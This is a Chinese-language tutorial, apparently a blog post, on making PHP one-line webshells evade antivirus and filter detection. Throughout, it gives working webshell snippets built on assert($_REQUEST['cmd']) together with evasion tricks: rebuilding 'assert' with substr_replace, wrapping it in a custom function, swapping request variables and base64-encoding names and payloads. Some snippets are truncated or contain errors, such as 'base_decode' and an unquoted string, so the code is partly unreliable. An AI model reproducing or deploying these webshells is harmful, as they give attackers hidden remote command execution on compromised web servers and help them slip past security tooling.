php一句话木马免杀

php一句话木马免杀

针对于php一句话木马做免杀:

利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀

assert()

如果过滤eval()函数时,可以考虑尝试assert()函数

assert() 会将字符串当做PHP 代码来执行

  • assert() 只能执行单条PHP 语句。
  • assert() 是一个函数,可以动态调用。
  • 高版本PHP 中,assert() 被弃用

此时一句话木马即可构造为

 @assert($_REQUEST['cmd']); ?>

字符拼接函数

当eval和assert都被过滤时,即可考虑将函数拆分重组

例如


可正常执行

php一句话木马免杀_第1张图片

编码加密后也可连接

php一句话木马免杀_第2张图片

php函数替换拼接

可以使用php函数来进行字符串的替换拼接

substr_replace() 函数是 PHP 中用于替换字符串中的一部分内容的函数

使用方法:

string substr_replace ( string $string , string $replacement , int $start [, int $length ] )

参数说明:

  • $string:原始字符串。
  • $replacement:替换的字符串。
  • $start:替换的起始位置。
  • $length:可选参数,指定要替换的长度。如果未指定,则替换从起始位置开始一直到字符串末尾的部分

示例


	$a=substr_replace("asxxxx","se",2);
	$b=substr_replace($a,"rt",4);
	@$b($_REQUEST['cmd']);
?>

同上可执行可连接

定义函数包裹

使用定义函数,将危险函数放进函数中,替代调用


	function asrt1($a){
		assert($a);
	}
	@asrt1($_REQUEST['cmd']);
?>

GPC替换

当request被过滤时,尝试使用GET或者POST

当然该参数也可以使用字符串拼接等方式组合

加密

例如使用base64加密


	$a=base_decode(YXNzZXJ0/ZXZhbA==);
    $b=$a(base64_decode($_REQUEST['cmd']));
?>

生成一句话马文件

')?>

同理,如果该函数中出现过滤,则可考虑使用上述的拼接替换字符

你可能感兴趣的:(php,开发语言,网络安全,安全,web安全,安全威胁分析)